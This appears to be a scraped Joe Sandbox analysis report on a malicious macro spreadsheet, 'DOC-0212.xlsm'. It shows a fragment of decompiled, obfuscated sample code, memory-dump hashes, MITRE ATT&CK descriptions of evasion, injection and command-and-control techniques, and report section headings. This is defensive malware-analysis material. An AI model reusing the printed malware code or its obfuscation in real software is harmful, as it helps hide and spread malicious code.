				_v12 = _v12 >> 0xe;
				_v12 = _v12 ^ 0x9c63d73c;
				_v12 = _v12 ^ 0x9c6af444;
				_v8 = 0x5b66fe;
				_v8 = _v8 << 0xd;
				_v8 = _v8 | 0x4c53bd11;
				_v8 = _v8 ^ 0x6cd412c8;
				E001B0A93(0x3380cc20, 0x183, __ecx, __ecx, 0x97da6f6d);
				_t31 = CloseHandle(_a4); // executed
				return _t31;
			}

0x001b4a39
0x001b4a3d
0x001b4a3e
0x001b4a43
0x001b4a4d
0x001b4a51
0x001b4a58
0x001b4a5f
0x001b4a63
0x001b4a6a
0x001b4a71
0x001b4a78
0x001b4a7c
0x001b4a83
0x001b4aa4
0x001b4aaf
0x001b4ab4

APIs

CloseHandle.KERNELBASE(9C6AF444), ref: 001B4AAF

Memory Dump Source

Source File: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9e5bd5d73aec3ea279f7cdbeccba634f714557f0b111e67455b7d3a5834c50fd
Instruction ID: 3f8990b6cb7071e64092fc25f479a7293ad9646ff091bf4deeb2bf30cfbc7536
Opcode Fuzzy Hash: 9e5bd5d73aec3ea279f7cdbeccba634f714557f0b111e67455b7d3a5834c50fd
Instruction Fuzzy Hash: 7001F675E0020CFFCB45EFE4C84A99EBFB4EB10704F10C188E515A6221E7B5AB149F81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report DOC-0212.xlsm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "DOC-0212.xlsm"

Indicators

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Function 01ECB3B4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
COMMON

Function 01EC505F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
COMMON

Function 01EC2C3A, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38
stringCOMMON

Function 01ECF66B, Relevance: 1.6, APIs: 1, Instructions: 74
processCOMMON

Function 6E43D530, Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 445
memoryCOMMONCrypto

Function 6E43E690, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 135
libraryloadersynchronizationCOMMON

Function 01ED07D2, Relevance: .0, Instructions: 2
COMMON

Function 6E43DEE0, Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 451
memorylibraryloaderCOMMON

Function 6E43C8C0, Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 477
memoryCOMMON